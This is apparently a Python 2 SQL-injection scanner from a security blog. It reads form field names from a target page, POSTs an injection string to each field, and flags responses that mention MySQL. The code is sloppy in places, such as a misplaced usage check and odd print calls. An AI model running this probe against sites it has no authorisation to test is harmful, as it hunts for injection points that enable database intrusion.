webscan module - sqli module

1. #!/usr/bin/env python
2.  
3. # try_POST_sqli.py
4. #
5. # first we will GET argv[1]/page.argv[2] to read it
6. # and find out what names/inputs/submits/etc... there are.
7. # next we will POST those param-names separetly with 'payload'.
8. #
9. # more @ http://hauntit.blogspot.com
10. # enjoy.
11.  
12. import urllib
13. import urllib2
14. import re
15. import sys
16. import httplib
17.  
18. host = sys.argv[1]
19. path_file = sys.argv[2]
20. url = host+':80'
21.  
22. url_file = url+path_file
23.  
24. payload = '\';]SQLI?^&*(O:UI:Y@:>T^#/**'
25.  
26. print 'Target: ',host
27. print 'Vuln file: ',path_file
28. print 'Full URL to attack:' ,url_file
29. print
30.  
31. # first we must GET page, to read whole text to find
32. # if there is any of our 'vulnerable' (to test) string.
33. get_connect = urllib.urlopen('http://'+url_file)
34. get_response = get_connect.read()
35. status = get_connect.getcode()
36.  
37. print 'Status of requested page: ',status
38.  
39.  
40. # what we're looking for:
41. #results = re.findall("<(input|textarea|select).+?name=['\"].(.+?)['\"].*?>",get_response)
42. results = re.findall(" name=\"([^\"]+)\"",get_response)
43.  
44. #############################################################
45. # hm ;] one idea to test right now. ;D
46. poc = open('log_file_with_sql_output.txt','w')
47.  
48. #############################################################
49.  
50. # func to send POST to target url+found parameter
51. def do_post_now(url):
52.   params = urllib.urlencode ( { results[i] : payload } )
53.   headers = {'Content-type':'application/x-www-form-urlencoded','Accept':'text/plain'}
54.   connect = httplib.HTTPConnection(url)
55.   connect.request('POST', path_file, params, headers)
56.   response = connect.getresponse()
57.   print response.status, response.reason # 200 OK?
58.   data = response.read()
59.   connect.close() # end of test this parameter at this URL
60.   y=0
61.   line = data.find('MySQL')
62.   if line != -1:
63.     print '\t[+- (  POST SQLI alert!  ) -+]'
64.     print '\t [+] Found sqli in line:' ,line
65.     print data[y]
66.     print poc.writelines(data)
67.     #poc.close() # write&save simple p0c file. ;7
68.     y=y+1
69.    
70. # end of do_post_now(url)
71. # ---
72.  
73. # MAIN:
74. if len(sys.argv) < 2:
75.   sys.stderr.write('usage: '+sys.argv[0]+' localhost /path/2file.php')
76.   sys.exit(1)
77. else:
78.  
79.   # if result found:
80.   if (len(results)>0):
81.     print '-------------------------------------------------------------'
82.     print 'Got some results :) Now we can try to exploit parameters.\n'
83.  
84.     i = 0 # next in list
85.     while i < len(results):
86.       print 'Found param called: ',results[i]  
87.    
88.       print 'Do POST now, for URL: ', url, ' with param: ', results[i]
89.       do_post_now(url)
90.       # end of this POST for this parameter
91.  
92.     # and next line:
93.       i=i+1
94.     # end of while i loop